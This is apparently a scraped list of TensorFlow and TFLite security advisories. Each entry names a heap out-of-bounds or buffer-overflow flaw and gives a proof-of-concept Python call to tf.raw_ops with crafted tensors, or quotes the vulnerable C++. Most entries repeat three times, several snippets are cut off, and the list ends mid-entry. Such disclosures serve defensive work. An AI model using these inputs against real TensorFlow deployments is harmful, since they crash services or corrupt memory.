The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) argmax = tf.constant([1], shape=[1], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)

Heap out of bounds in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …

Heap out of bounds in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …

Heap out of bounds in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …

Heap OOB write in TFLite

A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never true, so …

Heap OOB write in TFLite

A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never true, so …

Heap OOB write in TFLite

A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never true, so …

Heap OOB read in TFLite

A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }

Heap OOB read in TFLite

A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }

Heap OOB read in TFLite

A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }

Heap OOB read in `tf.raw_ops.Dequantize`

Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …

Heap OOB read in `tf.raw_ops.Dequantize`

Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …

Heap OOB read in `tf.raw_ops.Dequantize`

Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …

Heap OOB in `QuantizeAndDequantizeV3`

An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3: import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3)

Heap OOB in `QuantizeAndDequantizeV3`

An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3: import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3)

Heap OOB in `QuantizeAndDequantizeV3`

An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3: import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3)

Heap OOB and null pointer dereference in `RaggedTensorToTensor`

Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can exploit an undefined behavior if input arguments are empty: import tensorflow as tf shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) default_value = tf.constant(404, dtype=tf.int64) row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) rows = [row] types = ['ROW_SPLITS'] tf.raw_ops.RaggedTensorToTensor( shape=shape, values=values, default_value=default_value, row_partition_tensors=rows, row_partition_types=types)

Heap OOB and null pointer dereference in `RaggedTensorToTensor`

Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can exploit an undefined behavior if input arguments are empty: import tensorflow as tf shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) default_value = tf.constant(404, dtype=tf.int64) row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) rows = [row] types = ['ROW_SPLITS'] tf.raw_ops.RaggedTensorToTensor( shape=shape, values=values, default_value=default_value, row_partition_tensors=rows, row_partition_types=types)

Heap OOB and null pointer dereference in `RaggedTensorToTensor`

Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can exploit an undefined behavior if input arguments are empty: import tensorflow as tf shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) default_value = tf.constant(404, dtype=tf.int64) row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) rows = [row] types = ['ROW_SPLITS'] tf.raw_ops.RaggedTensorToTensor( shape=shape, values=values, default_value=default_value, row_partition_tensors=rows, row_partition_types=types)

Heap OOB access in unicode ops

An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode: import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_encoding)

Heap OOB access in unicode ops

An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode: import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_encoding)

Heap OOB access in unicode ops

An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode: import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_encoding)

Heap OOB access in `Dilation2DBackpropInput`

An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) tf.raw_ops.Dilation2DBackpropInput( input=input_tensor, filter=filter, out_backprop=out_backprop, strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')

Heap OOB access in `Dilation2DBackpropInput`

An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) tf.raw_ops.Dilation2DBackpropInput( input=input_tensor, filter=filter, out_backprop=out_backprop, strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')

Heap OOB access in `Dilation2DBackpropInput`

An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) tf.raw_ops.Dilation2DBackpropInput( input=input_tensor, filter=filter, out_backprop=out_backprop, strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')

Heap buffer overflow in `StringNGrams`

An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `StringNGrams`

An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `StringNGrams`

An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `SparseTensorToCSRSparseMatrix`

An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([0.0], dtype=np.float32) dense_shape = [0, 0] st = tf.SparseTensor(indices_array, value_array, dense_shape) values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape)

Heap buffer overflow in `SparseTensorToCSRSparseMatrix`

An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([0.0], dtype=np.float32) dense_shape = [0, 0] st = tf.SparseTensor(indices_array, value_array, dense_shape) values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape)

Heap buffer overflow in `SparseSplit`

An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit: import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)

Heap buffer overflow in `SparseSplit`

An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit: import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)

Heap buffer overflow in `SparseSplit`

An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit: import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)

Heap buffer overflow in `RaggedTensorToTensor`

An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `RaggedTensorToTensor`

An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `RaggedTensorToTensor`

An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)

Heap buffer overflow in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)

Heap buffer overflow in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)

Heap buffer overflow in `QuantizedResizeBilinear`

An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization: import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)

Heap buffer overflow in `QuantizedResizeBilinear`

An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization: import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)

Heap buffer overflow in `QuantizedResizeBilinear`

An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization: import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)

Heap buffer overflow in `QuantizedReshape`

An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization: import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)

Heap buffer overflow in `QuantizedReshape`

An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization: import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)

Heap buffer overflow in `QuantizedReshape`

An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization: import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)

Heap buffer overflow in `QuantizedMul`

An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization: import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], dtype=tf.float32) max_y = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Heap buffer overflow in `QuantizedMul`

An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization: import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], dtype=tf.float32) max_y = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Heap buffer overflow in `QuantizedMul`

An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization: import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], dtype=tf.float32) max_y = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Heap buffer overflow in `MaxPoolGrad`

The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPoolGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])

Heap buffer overflow in `MaxPoolGrad`

The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPoolGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])

Heap buffer overflow in `MaxPoolGrad`

The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPoolGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])

Heap buffer overflow in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …

Heap buffer overflow in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …

Heap buffer overflow in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …

Heap buffer overflow in `FractionalAvgPoolGrad`

The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False)

Heap buffer overflow in `FractionalAvgPoolGrad`

The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False)

Heap buffer overflow in `FractionalAvgPoolGrad`

The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False)

Heap buffer overflow in `Conv3DBackprop*`

Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows: import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …

Heap buffer overflow in `Conv3DBackprop*`

Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows: import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …

Heap buffer overflow in `Conv3DBackprop*`

